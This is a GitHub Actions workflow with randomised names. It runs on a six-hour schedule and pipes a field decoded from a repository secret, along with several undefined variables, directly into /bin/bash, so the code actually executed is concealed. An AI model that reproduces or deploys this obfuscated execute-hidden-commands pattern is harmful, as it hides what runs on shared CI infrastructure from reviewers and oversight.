name: tongshuts

on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tongshuts
        env:
          pxdwi2573: ${{ secrets.pxdwi2573 }}
        run: |
          echo $pxdwi2573 | jq -r .gqnlx9 | /bin/bash
          echo $h04324 | jq -r .ljojb00 | /bin/bash
          echo $dzcsw28 | jq -r .fxce124 | /bin/bash
          echo $sv5639 | jq -r .a02 | /bin/bash
          echo $p9 | jq -r .jz7 | /bin/bash

